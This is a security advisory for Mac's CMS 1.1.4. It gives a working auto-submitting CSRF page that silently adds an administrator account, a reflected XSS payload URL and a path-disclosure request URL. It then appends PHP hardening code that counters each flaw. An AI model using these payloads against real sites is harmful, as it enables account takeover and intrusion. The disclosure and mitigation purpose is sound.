Mac's CMS - Multiple vulnerabilities

2013-08-15 / 2013-08-16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#####################################
# Exploit Title: Mac's CMS - Multiple vulnerabilities
# Date: 2013 14 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes to: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://macs-framework.sourceforge.net/
# Tested on: Linux & Windows, PHP 5.3.4
# Affected Version : 1.1.4
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
####################################

Summary:
========
1. CSRF - Adding/Editing administrator account
2. Cross site scripting
3. Local path disclosure

1. CSRF - Adding/Editing administrator account:
===============================================
The following exploit can be used against any site running "Mac's CMS". After a successful attack, the text "User: yashar was added successfully. Click Here to update your view" appears. I only illustrate adding a user; editing is similar.

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm" action="http://server/index.php/main/cms/saveUser" method="post">
<input type="hidden" name="ajaxRequest" value="true">
<input type="hidden" name="username" value="yashar">
<input type="hidden" name="password" value="yashar">
<input type="hidden" name="confirmPassword" value="yashar">
<input type="hidden" name="emailAddress" value="y.shahinzadeh@gmail.com">
<input type="hidden" name="roleId" value="1">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

2. Cross site scripting:
========================
There are many XSS issues (reflected and stored) in this CMS; I will provide one live example:

http://server/libs/standalone/whois/example.php/%22%3E%3Cscript%3Ealert%28%27123%27%29%3C/script%3E

3. Local path disclosure:
=========================
Several pages leak the local installation path. The path is valuable and can be used in injection attacks and more.
I will give only one instance:

http://server/index.php/main/cms/getComments/?controller=main&function=index&pageIndex[$test]=1&paginationKey=comments

/** Yashar shahinzadeh **/
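The three findings above share one root cause: request parameters are trusted without a per-session token, reflected without escaping, and passed to code that emits PHP warnings (including the absolute script path) straight to the client. The following is an added example, not Mac's CMS code, of how a "save user" style admin action and a paginated listing would be hardened against all three. Names such as csrf_token, csrf_check and expect_int are assumptions made for this illustration; the handler assumes PHP 7.3 or later, unlike the 5.3.4 the advisory was tested on.

```php
<?php
// Added example (not part of Mac's CMS): hardened sketch of an admin
// "save user" action plus a paginated page, covering the advisory's
// CSRF, reflected XSS and path-disclosure findings. Function and field
// names (csrf_token, csrf_check, expect_int) are assumptions.
declare(strict_types=1);

// 3. Path disclosure: keep warnings/notices out of the response. A type
//    confusion such as pageIndex[$test]=1 would otherwise print the
//    absolute script path to the client. Log them server-side instead.
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 1. CSRF, defence in depth: a SameSite=Lax session cookie is not sent on
//    cross-site top-level POSTs like the advisory's auto-submitting form.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// 1. CSRF, primary control: synchronizer token bound to the session and
//    embedded in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or non-string token fails closed.
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// 3. Reject parameters that are not a scalar of the expected shape.
//    getComments/?pageIndex[$test]=1 arrives here as an array and becomes
//    a plain 400 instead of a warning that reveals the install path.
function expect_int(array $params, string $key, int $default): int
{
    $v = $params[$key] ?? $default;
    if (!is_int($v) && !is_string($v)) {
        http_response_code(400);
        exit('bad request');
    }
    $n = filter_var($v, FILTER_VALIDATE_INT);
    if ($n === false || $n < 0) {
        http_response_code(400);
        exit('bad request');
    }
    return $n;
}

// 2. XSS: escape everything reflected into HTML, including URL fragments
//    such as the PATH_INFO the whois example.php echoes back.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    $username = $_POST['username'] ?? '';
    if (!is_string($username) || $username === '') {
        http_response_code(400);
        exit('bad request');
    }
    // ... authorisation check and user creation would go here ...
    echo 'User: ' . h($username) . ' was added successfully.';
    exit;
}

$pageIndex = expect_int($_GET, 'pageIndex', 1);
?>
<p>Page <?= $pageIndex ?></p>
<form method="post" action="<?= h($_SERVER['PHP_SELF']) ?>">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input name="username">
  <button type="submit">Add user</button>
</form>
```

The CSRF page in the advisory would be stopped twice by this handler: the browser omits the Lax session cookie on the cross-site POST, and even with a cookie the request carries no csrf_token that matches the victim's session. Note that the token check assumes the session itself is not already compromised by the stored XSS from finding 2, which is why output escaping is not optional here.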

